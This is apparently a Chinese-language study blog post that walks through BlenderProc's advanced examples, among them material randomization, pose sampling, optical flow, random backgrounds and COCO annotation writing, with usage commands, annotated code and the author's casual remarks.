    这段代码的作用是向已经加载到 Blender 中的模型对象的所有材质(material)中添加灰尘效果。

    具体而言,代码执行了以下几个步骤:

    1. 使用 obj.get_materials() 方法从 obj 对象中获取所有的材质,并使用 for 循环遍历每一个材质。

    2. 在循环中,使用 bproc.material.add_dust(material, strength=0.8, texture_scale=0.05) 函数向当前遍历的材质中添加灰尘。该函数接受三个参数:

      • material:要添加灰尘的材质对象。
      • strength:灰尘的强度,默认为 0.5。
      • texture_scale:灰尘纹理的缩放比例,默认为 0.01。

      相关的代码将根据这些参数将灰尘纹理应用于材质,从而使其看起来更加逼真。

    因此,这段代码使您能够轻松地向已经加载到 Blender 中的模型对象添加灰尘效果,从而使其看起来更加逼真。

    Object selection and manipulation using displacement modifier

    该示例演示了如何使用不同纹理添加不同位移修饰符作为 EntityManipulator 模块的一部分来操作实体。

    Usage

    blenderproc run examples/advanced/entity_displacement_modifier/main.py examples/resources/scene.obj examples/advanced/entity_displacement_modifier/output

    Visualization

    blenderproc vis hdf5 examples/advanced/entity_displacement_modifier/output/0.hdf5

    png

    Code

    # Add displacement to all objects
    for obj in objs:
    # Create a uv mapping based on a cylinder projection
    obj.add_uv_mapping("cylinder")

    # Create a random procedural texture
    texture = bproc.material.create_procedural_texture('CLOUDS')
    # Displace the vertices of the object based on that random texture
    obj.add_displace_modifier(
    texture=texture,
    strength=random.gauss(0, 0.5),
    subdiv_level=random.randint(1, 3),
    )

    如果一个对象没有 UV 映射,我们将添加一个,因为它对于将位移纹理映射到对象是必要的。对于 UV 映射,我们选择使用 projection。Blender 给出的可能的投影类型有:“cube”、“cylinder”、“smart” 和 “sphere”。

    然后,我们为每个实体添加了一个带有随机纹理的位移修饰符。

    • strength 是几何体位移的量。我们在这里使用高斯分布对 strength 进行采样,均值为 0.0,标准差为 0.5
    • 如果应用子细分,则 subdiv_level 定义要在实体上执行的子细分数量。在本示例中,我们使用了一个或两个子细分。
    • mid_level 是文理值,将被处理为无位移的修饰符。纹理值低于此阈值将导致沿所选方向的负位移,而高于此阈值的纹理值将导致正位移。displacement = texture_value - mid_level。请记住,在 Blender 中,颜色/亮度值通常在(0.0 到 1.0)之间,而不是(0 到 255)之间。
    • 通过添加一个值到 min_vertices_for_subdiv,我们可以检查实体是否需要子细分修饰符。如果实体的顶点少于 min_vertices_for_subdiv,则会添加一个 Subdivision 材质,以增加顶点的数量。实体的顶点数对于位移修饰符有很大的影响。如果顶点不足,则位移修饰符效果不好。

    Camera lens distortion generation and validation

    该程序会生成典型的 BlenderProc 虚拟场景和已知姿态和内参的精确测量的相机校准板的扭曲图像(RGB、深度和法线)。后者将用于验证我们的几何相机模型,通过比较生成的图像与真实图像。

    emmmm 这个我应该用不到。

    Usage

    Standard Scene:

    blenderproc run examples/advanced/lens_distortion/main.py examples/resources/scene.obj examples/advanced/lens_distortion/output

    png

    simple calibration image by loading intrinsics and extrinsics from a file:

    blenderproc run examples/advanced/lens_distortion/main_callab.py examples/advanced/lens_distortion/callab_platte.obj examples/advanced/lens_distortion/camera_calibration_callab_img1.cal examples/advanced/lens_distortion/output

    png

    fairly distorted image:

    blenderproc run examples/advanced/lens_distortion/main_callab.py examples/advanced/lens_distortion/callab_platte_justin.obj examples/advanced/lens_distortion/camera_calibration_callab_img2.cal examples/advanced/lens_distortion/output

    png

    • 加载对象;将它们定位到世界参考帧的原点。
    • 创建一个点光源。
    • 设置相机内参,包括镜头畸变参数。
    • 初始化所有生成的无畸变图像(通常比所需的分辨率更高)的无畸变到畸变坐标映射,最终将其进行扭曲。
    • 对于第一个示例,或者加载使用相机校准软件(例如 DLR CalLab v1)测量得到的相机姿态,对相机与物体姿态进行采样。
    • 渲染 RGB、深度和法线图像。
    • 应用镜头畸变(对于时间上的、高分辨率的中间 Blender 图像),然后将它们裁剪到所需的分辨率。
    • 将畸变数据写入 .hdf5 容器。
    • 通过将生成的图像与参考真实图像 ./images/lens_img1_real.jpg./images/lens_img2_real.png 进行比较来进行测试。

    Material Randomization

    Usage

    blenderproc run examples/advanced/material_randomizer/main.py examples/resources/scene.obj examples/advanced/material_randomizer/output
    • examples/advanced/material_randomizer/main.py: path to the main python file to run.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/material_randomizer/output: path to the output directory.

    Visualizaton

    多次运行结果,Material 一般不同:

    png

    png

    Code

    # Collect all materials
    materials = bproc.material.collect_all()

    # Go through all objects
    for obj in objs:
    # For each material of the object
    for i in range(len(obj.get_materials())):
    # In 50% of all cases
    if np.random.uniform(0, 1) <= 0.5:
    # Replace the material with a random one
    obj.set_material(i, random.choice(materials))

    这段代码的作用是对已经加载到 Blender 中的所有对象进行操作,随机替换这些对象的材质。

    具体而言,代码执行了以下几个步骤:

    1. 首先使用 for obj in objs: 循环遍历所有在 Blender 环境中加载的对象,并对每个对象执行以下操作。
    2. 在循环中,对于当前遍历对象的每一个材质,使用 for i in range(len(obj.get_materials())): 进行循环遍历。
    3. 在每次循环中,使用 np.random.uniform(0, 1) 函数生成一个 0 到 1 之间的随机数,并判断是否小于等于 0.5,即 50% 的概率。如果是,则执行以下操作。
    4. 使用 obj.set_material(i, random.choice(materials)) 函数将当前遍历的材质替换为从 materials 列表中随机选择的一个材质。其中,materials 列表是预先定义的包含多种材质的列表。

    因此,这段代码使您能够轻松地对已经加载到 Blender 中的所有对象进行操作,并以一定的概率随机更改它们的材质,可以为渲染器提供更丰富和多样化的渲染效果。

    Motion Blur and Rolling Shutter

    在这个例子中,我们展示如何生成运动模糊和滚动快门效果。

    这些效果是可见的,如果相机或对象在帧之间移动。相机在物体静止的情况下经历以下运动:

    0 -10 4 1.3 0 0 # initial position
    0 -15 4 1.3 0 0 # moving away from object
    5 -15 4 1.3 0 0 # moving to the right
    5 -15 8 1.3 0 0 # moving upwards
    1 -11 5 1.3 0 0 # combined motion (to the left, towards object and downwards)

    Usage

    blenderproc run examples/advanced/motion_blur_rolling_shutter/config_motion_blur.yaml examples/advanced/motion_blur_rolling_shutter/camera_positions examples/resources/scene.obj examples/advanced/motion_blur_rolling_shutter/output

    跑不动,西内。

    Object pose sampling

    这个例子的重点是介绍 object.ObjectPoseSampler,它允许在采样体积内进行带有碰撞检查的对象姿态采样。

    Usage

    blenderproc run examples/advanced/object_pose_sampling/main.py examples/resources/camera_positions examples/resources/scene.obj examples/advanced/object_pose_sampling/output
    • examples/advanced/object_pose_sampling/main.py: path to the main python file to run.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/object_pose_sampling/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/advanced/object_pose_sampling/output/0.hdf5

    png

    Code

    # Define a function that samples the pose of a given object
    def sample_pose(obj: bproc.types.MeshObject):
    obj.set_location(np.random.uniform([-5, -5, -5], [5, 5, 5]))
    obj.set_rotation_euler(np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]))

    # Sample the poses of all objects, while making sure that no objects collide with each other.
    bproc.object.sample_poses(
    objs,
    sample_pose_func=sample_pose,
    objects_to_check_collisions=objs
    )

    定义一个函数,采样并设置对象的位置和旋转。对象被放置在采样的姿态上,并对 objects_to_check_collisions 指定的所有对象执行碰撞检查(默认为所有对象)。如果发生碰撞,位置将被重置,并尝试重新采样。最大尝试次数可以由 max_tries 定义。

    On surface object pose Sampling

    这个示例的重点是 OnSurfaceSampler,它允许对所选表面上的某些对象进行姿态采样。

    Usage

    blenderproc run examples/advanced/on_surface_object_sampling/main.py examples/resources/camera_positions examples/advanced/on_surface_object_sampling/scene.blend examples/advanced/on_surface_object_sampling/output
    • examples/advanced/on_surface_object_sampling/main.py: path to the main python file to run.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/advanced/on_surface_object_sampling/scene.blend: path to the object file with the basic scene.
    • examples/advanced/on_surface_object_sampling/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/advanced/on_surface_object_sampling/output/0.hdf5

    png

    png

    Code

    # Define a function that samples the pose of a given object
    def sample_pose(obj: bproc.types.MeshObject):
    # Sample the spheres location above the surface
    obj.set_location(bproc.sampler.upper_region(
    objects_to_sample_on=[surface],
    min_height=1,
    max_height=4,
    use_ray_trace_check=False
    ))
    obj.set_rotation_euler(np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]))

    这段代码的作用是定义一个函数 sample_pose,并使用该函数对已经加载到 Blender 中的模型对象进行姿态采样操作。

    具体而言,代码执行了以下几个步骤:

    1. 首先定义了一个名为 sample_pose 的函数,函数的输入参数为一个 bproc.types.MeshObject 类型的对象 obj,表示需要进行姿态采样的模型对象。函数内部执行了以下操作:
      • 使用 bproc.sampler.upper_region() 函数对当前对象进行位置采样,生成一个位置矢量,并使用 obj.set_location() 方法将该位置矢量设置为当前模型对象的位置。在此处,我们使用以下参数配置:
        • objects_to_sample_on:一个 List[bproc.types.Object] 类型的列表,表示采样参考物体的集合。在这里,我们将表面 object 添加到采样参考物体中。
        • min_heightmax_height:分别表示采样位置的最小高度和最大高度。在这里,我们将其设为 1 和 4,表示采样位置在表面 object 的上方 1 到 4 个单位长度之间。
        • use_ray_trace_check:一个布尔值,表示是否使用光线跟踪检查避免生成的位置与其他物体相交。在这里,我们将其设置为 False,即不进行光线跟踪检查。
      • 使用 np.random.uniform([0, 0, 0], [np.pi * 2, np.pi * 2, np.pi * 2]) 函数生成一个随机欧拉角矢量,并使用 obj.set_rotation_euler() 方法将该欧拉角矢量设置为当前模型对象的旋转。
    2. 在完成函数定义后,该函数可以用于对已经加载到 Blender 中的模型对象进行位置采样和姿态采样操作,从而增加渲染效果的多样性和逼真性,特别是当需要将某个物体放置在表面上方时。

    因此,这段代码提供了一种简单的方法来对模型对象进行采样操作,并可扩展成复杂的采样逻辑,从而为渲染器提供更加丰富和逼真的场景渲染效果。

    # Sample the spheres on the surface
    spheres = bproc.object.sample_poses_on_surface(spheres, surface, sample_pose, min_distance=0.1, max_distance=10)

    设置刚体:

    # Enable physics for spheres (active) and the surface (passive)
    for sphere in spheres:
    sphere.enable_rigidbody(True)
    surface.enable_rigidbody(False)

    物理模拟:

    # Run the physics simulation
    bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=2, max_simulation_time=4, check_object_interval=1)

    Optical Flow

    在本示例中,我们演示了如何获取连续关键帧之间的前向/后向流值。

    如果相机或物体在帧之间移动,则流会变得可见。在这里,相机经过以下运动:

    0 -10 4 1.3 0 0  # initial position
    0 -12 4 1.3 0 0 # moving away from object
    2 -12 4 1.3 0 0 # moving to the right
    2 -12 6 1.3 0 0 # moving upwards
    1 -11 5 1.3 0 0 # combined motion (to the left, towards object and downwards)

    Usage

    blenderproc run examples/advanced/optical_flow/main.py examples/advanced/optical_flow/camera_positions examples/resources/scene.obj examples/advanced/optical_flow/output
    • examples/advanced/optical_flow/main.py: path to the main python file to run.
    • examples/advanced/optical_flow/camera_positions: text file with parameters of camera positions.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/optical_flow/output: path to the output directory.

    Usage

    blenderproc vis hdf5 examples/advanced/optical_flow/output/1.hdf5

    png

    Code

    # Render the optical flow (forward and backward) for all frames
    data.update(bproc.renderer.render_optical_flow(get_backward_flow=True, get_forward_flow=True, blender_image_coordinate_style=False))
    • 遍历所有相机位姿并渲染前向和/或后向光流。
    • 使用 .exr 格式渲染图像,该格式允许线性颜色空间和更高的精度,然后将其转换为 numpy.float32 数组。
    • 默认情况下,Blender 使用左下角作为坐标系统原点。OpenCV 和流行的 Flow 数据集使用上部左角。如果要使用默认的 Blender 行为,请更改标志 "blender_image_coordinate_style": True。请注意,可视化中的颜色将不同!

    Convex decomposition for generating stable and exact collision shapes

    在 Blender 中运行物理模拟时,选择正确的碰撞形状对于实现稳定结果至关重要。虽然使用 CONVEX_HULL 碰撞形状可以获得非常稳定的模拟结果,但对于非凸面体对象(例如,浮动的物体),结果可能看起来非常不切实际。MESH 碰撞形状允许进行更精确的碰撞,但模拟也会变得非常不稳定,物体可能会相互穿透。

    CONVEX_DECOMPOSITION 是两者之间的折衷方案:使用 V-HACD 算法 将给定的非凸面体对象分解成多个近似凸部分。这些部分的并集可以用作物体的精确且稳定的碰撞形状。

    在这个例子中,我们加载了一个垃圾箱和一些高度非凸面体的 ShapeNet 对象,应用凸分解生成碰撞形状,然后让这些物体掉进垃圾箱里。

    不好下数据集+感觉用不到,give up!

    Random Backgrounds

    jpg

    在这个例子中,我们生成了一个物体 (Suzanne) 的渲染图像,并将它们粘贴到随机的背景图像上,随机化对象的位置、方向、材质属性和照明。这是一种简单的方法来生成用于训练分类、物体检测和分割任务的数据。它易于实现和使用,但与实际 3D 场景中的物体渲染相比通常会导致较差的结果。

    Usage

    blenderproc run examples/advanced/random_backgrounds/main.py examples/advanced/random_backgrounds/object.ply examples/advanced/random_backgrounds/output
    • examples/advanced/random_backgrounds/main.py: path to the main python file to run.
    • examples/advanced/random_backgrounds/object.ply: path to the object file.
    • examples/advanced/random_backgrounds/output: path to the output directory.

    emmm就是渲染一个不含背景的图片,然后把背景换成其他的。

    然后再:

    python examples/advanced/random_backgrounds/paste_images_on_backgrounds.py --images examples/advanced/random_backgrounds/output/coco_data/images --backgrounds path/to/background/images --overwrite

    添加背景。

    Code

    # Enable transparency so the background becomes transparent
    bproc.renderer.set_output_format(enable_transparency=True)

    这段代码的作用是启用 Blender 内置渲染器的透明背景功能,使得渲染输出结果中的背景变为透明的。

    具体而言,代码执行了以下操作:

    1. 首先调用了 bproc.renderer 模块下的 set_output_format() 函数,该函数用于设置渲染输出格式。在此,我们设置了一个参数 enable_transparency=True,用于启用透明背景功能。
    2. 启用透明背景功能后,当使用 Blender 渲染器进行渲染时,原本的背景将会被自动设为透明色,从而能够与其他软件进行无缝合成和叠加。

    因此,这段代码可以帮助您快速启用 Blender 渲染器的透明背景功能,方便进行后续的图像处理和合成操作。

    Random Room Constructor

    这个例子解释了 RandomRoomConstructor。该模块可以构建随机房间,并在其中放置从其他模块加载的对象。

    本例使用了 CCMaterialLoader。所以要下载 cc_textures 的纹理,我们提供了一个脚本。它还使用了 IkeaLoader,请参见 Ikea 的例子。

    这两者都需要使用才能使用此示例。

    又不好下载,give up!

    Code

    # Load materials and objects that can be placed into the room
    materials = bproc.loader.load_ccmaterials(args.cc_material_path, ["Bricks", "Wood", "Carpet", "Tile", "Marble"])
    interior_objects = []
    for i in range(15):
    interior_objects.extend(bproc.loader.load_ikea(args.ikea_path, ["bed", "chair", "desk", "bookshelf"]))

    通过脚本下载了 cctextures,这里仅使用名称列表中包含其中一个名称的资产。这使得它更加真实,因为像 "Asphalt" 这样的东西通常不会在室内发现。此外,也从指定的 Ikea 数据集类别中加载了 15 个对象。

    # Construct random room and fill with interior_objects
    objects = bproc.constructor.construct_random_room(used_floor_area=25,
    interior_objects=interior_objects,
    materials=materials, amount_of_extrusions=5)

    construct_random_room 构建了一个随机的地面平面,并构建了相应的墙壁和天花板。它将加载的 Ikea 对象随机放置在位置,并设置 cc-texture 材料。房间的地面面积为 25 平方米,它最多有 5 个挤出。挤出是一种走廊,它从中间的基本矩形中伸出。它们可以更宽或更窄,但永远不会小于最小的 corridor_width。模块将自动将 25 平方米分配到所有挤出部分中。

    # Bring light into the room
    bproc.lighting.light_surface([obj for obj in objects if obj.get_name() == "Ceiling"], emission_strength=4.0)

    让天花板发光,并移除放置在其上的任何材料。

    ]]>
    + 资源

    仓库地址:DLR-RM/BlenderProc: A procedural Blender pipeline for photorealistic training image generation (github.com),下载到本地,用 python 打开,解释器使用之前创建的 blender 环境。

    课程

    Auto shading

    Usage

    1
    blenderproc run examples/advanced/auto_shading/main.py examples/advanced/auto_shading/camera_position examples/advanced/auto_shading/scene.blend examples/advanced/auto_shading/output
    • examples/advanced/auto_shading/main.py: path to the main python file to run.
    • examples/advanced/auto_shading/camera_position: text file with parameters of camera positions.
    • examples/advanced/auto_shading/scene.blend: path to the blend file with the basic scene.
    • examples/advanced/auto_shading/output: path to the output directory.

    Visualization

    1
    blenderproc vis hdf5 examples/advanced/auto_shading/output/0.hdf5

    png

    Code

    1
    2
    3
    4
    5
    6
    7
    8
    9
    # Find the object with name "Sphere"
    sphere = bproc.filter.one_by_attr(objs, "name", "Sphere")
    # Set it to AUTO shading, so all angles greater than 45 degrees will be shaded flat.
    sphere.set_shading_mode("auto", 45)

    # Find the object with name "Sphere.001"
    other_sphere = bproc.filter.one_by_attr(objs, "name", "Sphere.001")
    # Set it to smooth shading, so all angles will be shaded flat.
    other_sphere.set_shading_mode("smooth")
    • 通过调用 bproc.filter.one_by_attr(objs, “name”, “Sphere”) 函数找到名为 “Sphere” 的物体,并将其赋值给变量 sphere。

    • 调用 sphere.set_shading_mode(“auto”, 45) 函数,将 sphere 对象的着色模式设置为 AUTO,表示自动根据面的角度决定使用平坦或平滑着色。同时给定一个阈值参数 45,即当面的角度大于 45 度时,该面将使用平坦着色,否则使用平滑着色。

    • 通过调用 bproc.filter.one_by_attr(objs, “name”, “Sphere.001”) 函数找到名为 “Sphere.001” 的物体,并将其赋值给变量 other_sphere。

    • 调用 other_sphere.set_shading_mode(“smooth”) 函数,将 other_sphere 对象的着色模式设置为 SMOOTH,表示所有面都使用平滑着色。

    Camera Depth of Field

    Usage

    1
    blenderproc run examples/advanced/camera_depth_of_field/main.py examples/resources/scene.obj examples/advanced/camera_depth_of_field/output
    • examples/advanced/camera_depth_of_field/main.py: path to the main python file to run.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/camera_depth_of_field/output: path to the output directory.

    Visualization

    1
    blenderproc vis hdf5 examples/advanced/camera_depth_of_field/output/0.hdf5

    png

    Code

    设置视点:

    1
    2
    3
    # Create an empty object which will represent the cameras focus point
    focus_point = bproc.object.create_empty("Camera Focus Point")
    focus_point.set_location([0.5, -1.5, 3])
    1
    2
    3
    4
    # define the camera intrinsics
    bproc.camera.set_resolution(512, 512)
    # Set the empty object as focus point and set fstop to regulate the sharpness of the scene
    bproc.camera.add_depth_of_field(focus_point, fstop_value=0.25)

    首先,通过调用 bproc.camera.set_resolution(512, 512) 函数设置相机分辨率为 512x512 像素。

    接着,通过调用 bproc.camera.add_depth_of_field(focus_point, fstop_value=0.25) 函数来添加景深效果。其中,focus_point 表示景深的焦点,即相机聚焦的对象(通常为场景中心)。fstop_value 参数控制景深的浅深范围,值越小,景深效果越明显。在本例中,fstop_value 被设置为 0.25,表明所拍摄的场景会呈现出比较明显的景深效果。

    COCO annotations

    Usage

    1
    blenderproc run examples/advanced/coco_annotations/main.py examples/resources/camera_positions examples/advanced/coco_annotations/scene.blend examples/advanced/coco_annotations/output
    • examples/advanced/coco_annotations/main.py: path to the main python file to run.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/advanced/coco_annotations/scene.blend: path to the blend file with the basic scene.
    • examples/advanced/coco_annotations/output: path to the output directory.

    Visualization

    使用 blenderproc 可视化 COCO 数据集格式的命令示例:

    1
    blenderproc vis coco [-i <image index>] [-c <coco annotations json>] [-b <base folder of coco json and image files>]

    生成 COCO 数据集形式的文件:

    png

    coco_annoatations.json 里的内容(感觉存了一段乱七八糟的东西):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    {
    "info": {
    "description": "coco_annotations",
    "url": "https://github.com/waspinator/pycococreator",
    "version": "0.1.0",
    "year": 2020,
    "contributor": "Unknown",
    "date_created": "2023-06-04 23:59:39.563796"
    },
    "licenses": [
    {
    "id": 1,
    "name": "Attribution-NonCommercial-ShareAlike License",
    "url": "http://creativecommons.org/licenses/by-nc-sa/2.0/"
    }
    ],
    "categories": [
    {
    "id": 1,
    "supercategory": "coco_annotations",
    "name": "Suzanne"
    },

    ...

    {
    "id": 9,
    "supercategory": "coco_annotations",
    "name": "Cube.001"
    }
    ],
    "images": [
    {
    "id": 0,
    "file_name": "images/000000.jpg",
    "width": 512,
    "height": 512,
    "date_captured": "2023-06-04 23:59:39.563796",
    "license": 1,
    "coco_url": "",
    "flickr_url": ""
    },
    {
    "id": 1,
    "file_name": "images/000001.jpg",
    "width": 512,
    "height": 512,
    "date_captured": "2023-06-04 23:59:39.672089",
    "license": 1,
    "coco_url": "",
    "flickr_url": ""
    }
    ],
    "annotations": [
    {
    "id": 1,
    "image_id": 0,
    "category_id": 1,
    "iscrowd": 0,
    "area": 8330,
    "bbox": [
    184,
    98,
    144,
    114
    ],
    "segmentation": {
    "counts": [
    94341,

    ...

    94583
    ],
    "size": [
    512,
    512
    ]
    },
    "width": 512,
    "height": 512
    },

    ...

    {
    "id": 16,
    "image_id": 1,
    "category_id": 9,
    "iscrowd": 0,
    "area": 25473,
    "bbox": [
    0,
    456,
    512,
    56
    ],
    "segmentation": {
    "counts": [
    460,

    ...

    34
    ],
    "size": [
    512,
    512
    ]
    },
    "width": 512,
    "height": 512
    }
    ]
    }

    在本例中:

    1
    blenderproc vis coco -i 1 -c coco_annotations.json -b examples/advanced/coco_annotations/output/coco_data

    然后你就会喜提报错:

    1
    2
    3
    4
    AttributeError: module 'numpy' has no attribute 'bool'.
    `np.bool` was a deprecated alias for the builtin `bool`. To avoid this error in existing code, use `bool` by itself. Doing this will not modify any behavior and is safe. If you specifically wanted the numpy scalar type, use `np.bool_` here.
    The aliases was originally deprecated in NumPy 1.20; for more details and guidance see the original release note at:
    https://numpy.org/devdocs/release/1.20.0-notes.html#deprecations. Did you mean: 'bool_'?

    vis_coco_annotation.py 里找到这行 np.bool_,把它改成 bool_

    png

    重新开跑!

    png

    Code

    1
    2
    3
    # Set some category ids for loaded objects
    for j, obj in enumerate(objs):
    obj.set_cp("category_id", j + 1)

    要创建 COCO 标注,我们需要渲染实例和类别映射。类别是根据自定义属性 “category_id” 定义的,该属性必须为每个实例预先定义。可以像上面一样通过自定义属性或在加载器中设置 category_id,也可以直接在 .blend 文件中定义。同时,我们还将 “name” 添加到映射中,以便稍后在 COCO 标注写入器中使用对象的名称为类别进行标记。


    1
    bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])

    调用 bproc.renderer.enable_segmentation_output(map_by=[“category_id”, “instance”, “name”]) 函数激活分割渲染功能。

    其中,“category_id”、“instance” 和 “name” 分别表示三种不同的标记方式,即按类别、物体实例和名称进行标记。

    这个函数的作用是将场景中的每个物体按照所选的标记方式标记,并将标记信息存储到渲染结果中。例如,如果选择 “category_id” 标记,则每个物体会被分配一个唯一的整数 ID,表示其所属的类别。


    1
    2
    3
    4
    5
    6
    # Write data to coco file
    bproc.writer.write_coco_annotations(os.path.join(args.output_dir, 'coco_data'),
    instance_segmaps=data["instance_segmaps"],
    instance_attribute_maps=data["instance_attribute_maps"],
    colors=data["colors"],
    color_file_format="JPEG")

    使用 bproc.writer.write_coco_annotations()生成 COCO 数据集。

    此函数将注释存储在 coco_annotations.json 中。可选地,您可以在 writer.CocoAnnotationsWriter 配置中设置 "supercategory": "<some_supercategory>",以通过先前分配的自定义属性 "supercategory" 过滤对象。

    通过调用 bproc.writer.write_coco_annotations() 函数将场景中的分割信息和属性信息写入 COCO 格式的注释文件中。

    其中:

    • os.path.join(args.output_dir, ‘coco_data’) 是注释文件的保存路径
    • instance_segmaps、instance_attribute_maps 和 colors 分别表示物体实例分割图、物体属性图和物体颜色信息,这些信息都是从渲染结果中提取得到的
    • color_file_format 参数表示颜色信息保存格式,这里被设置为 JPEG 格式。
    • 此函数会自动将提供的分割信息和属性信息转换为 COCO 格式,并将其保存到指定路径下的注释文件中。

    bproc.writer.write_coco_annotations()

    1
    2
    3
    4
    5
    6
    7
    8
    def write_coco_annotations(output_dir: str, instance_segmaps: Optional[List[np.ndarray]] = None,
    instance_attribute_maps: Optional[List[dict]] = None,
    colors: Optional[List[np.ndarray]] = None, color_file_format: str = "PNG",
    mask_encoding_format: str = "rle", supercategory: str = "coco_annotations",
    append_to_existing_output: bool = True, segmap_output_key: str = "segmap",
    segcolormap_output_key: str = "segcolormap", rgb_output_key: str = "colors",
    jpg_quality: int = 95, label_mapping: Optional[LabelIdMapping] = None,
    file_prefix: str = "", indent: Optional[Union[int, str]] = None):

    此函数按以下步骤编写 COCO 注释:

    1. 定位分割图像
    2. 定位 RGB 映射
    3. 定位 seg mappings
    4. 读取颜色映射
    5. 对于每个帧,编写 coco 注释

    参数解释如下:

    • output_dir:输出目录,用于编写 coco 注释
    • instance_segmaps:实例分割映射的列表
    • instance_attribute_maps:每帧的映射,具有 idx、class 和(可选)supercategory/bop_dataset_name
    • colors:颜色图像的列表。不支持立体图像,请依次输入左和右输入。
    • color_file_format:保存颜色图像的格式
    • mask_encoding_format:二进制掩模的编码格式。默认值为 ‘rle’。可用值:‘rle’、‘polygon’
    • supercategory:要过滤的数据集/超类别名称,例如通过 ‘bop_dataset_name’ 设定的特定 BOP 数据集集合或具有指定 ‘cp_supercategory’ 的任何已加载对象
    • append_to_existing_output:如果为 true,且输出目录中已经有 coco_annotations.json 文件,则新的 coco 注释将被追加到现有文件中。此外,rgb 图像将被命名,以避免冲突。
    • segmap_output_key:分割图像的输出键。应该与 SegMapRenderer 模块的输出键相同。默认值为 ‘segmap’。
    • segcolormap_output_key:为对象名称/类别对应关系注册 CSV 文件的输出键。应该与 SegMapRenderer 模块的 colormap_output_key 相同。默认值为 ‘segcolormap’。
    • rgb_output_key:RGB 图像的输出键。应该与 RgbRenderer 模块的输出键相同。默认值为 ‘colors’。
    • jpg_quality:所需的 jpg 编码质量级别
    • label_mapping:用于基于其 ID 对类别进行标记的标签映射。如果未给定 None,则使用 csv 文件中的 name 字段,或者(如果不存在)使用类别 ID 本身。
    • file_prefix:图像文件名的可选前缀
    • indent:如果缩进是非负整数或字符串,则注释输出将以该缩进级别进行漂亮的打印。缩进级别为 0、负数或 “” 仅插入换行符。None(默认值)选择最紧凑的表示。使用正整数缩进每个层级缩进那么多空格。如果缩进是字符串(例如 “\t”),那么该字符串用于缩进每个级别。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    # 对传入的三个可选参数进行类型检查和处理,确保它们都是列表类型。如果为 None,就改为空列表
    instance_segmaps = [] if instance_segmaps is None else list(instance_segmaps)
    colors = [] if colors is None else list(colors)
    #(怎么代码风格跟上面的不太一样?)
    if instance_attribute_maps is None:
    instance_attribute_maps = []

    # 检查 colors[0] 是否是四维数组,如果是,则抛出 ValueError 异常。这是因为 BlenderProc 目前不支持渲染立体图像,只能生成左右视图分别的图像/分割图像。
    if len(colors) > 0 and len(colors[0].shape) == 4:
    raise ValueError("BlenderProc currently does not support writing coco annotations for stereo images. "
    "However, you can enter left and right images / segmaps separately.")

    1
    2
    3
    # Create output directory
    # 创建输出目录,其中 'images' 目录用于存储转换后的图像。如果该目录已经存在,则不会创建新目录。
    os.makedirs(os.path.join(output_dir, 'images'), exist_ok=True)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    # 这些代码块用于查找渲染时生成的 RGB 图像、实例分割图像和属性映射文件的路径
    if not instance_segmaps:
    # 如果 instance_segmaps 列表是空的,则该代码会查找实例分割图像的路径,使用 Utility.find_registered_output_by_key() 方法查找已注册的输出
    # Find path pattern of segmentation images
    segmentation_map_output = Utility.find_registered_output_by_key(segmap_output_key)
    if segmentation_map_output is None:
    # 如果找不到 key 为 segmap_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 SegMapRenderer 模块
    raise RuntimeError(f"There is no output registered with key {segmap_output_key}. Are you sure you "
    f"ran the SegMapRenderer module before?")

    if not colors:
    # Find path pattern of rgb images
    # 如果 colors 列表为空,则该代码会查找 RGB 图像的路径
    rgb_output = Utility.find_registered_output_by_key(rgb_output_key)
    if rgb_output is None:
    # 如果找不到 key 为 rgb_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 RgbRenderer 模块
    raise RuntimeError(f"There is no output registered with key {rgb_output_key}. Are you sure you "
    f"ran the RgbRenderer module before?")

    if not instance_attribute_maps:
    # Find path of name class mapping csv file
    # 如果 instance_attribute_maps 列表为空,则该代码会查找实例分割图像到名称、类别标签的映射文件的路径
    segcolormap_output = Utility.find_registered_output_by_key(segcolormap_output_key)
    if segcolormap_output is None:
    # 如果找不到 key 为 segcolormap_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 SegMapRenderer 模块,并将 map_by 参数设置为 instance
    raise RuntimeError(f"There is no output registered with key {segcolormap_output_key}. Are you sure you "
    f"ran the SegMapRenderer module with 'map_by' set to 'instance' before?")

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    # 用于确定输出的 COCO 格式注释文件的路径,并在需要追加输出时计算图像编号的偏移量
    coco_annotations_path = os.path.join(output_dir, "coco_annotations.json")
    # Calculate image numbering offset, if append_to_existing_output is activated and coco data exists
    if append_to_existing_output and os.path.exists(coco_annotations_path):
    # 如果 append_to_existing_output 为 True,且文件系统中存在名为 'coco_annotations.json' 的文件,则将其加载到内存中
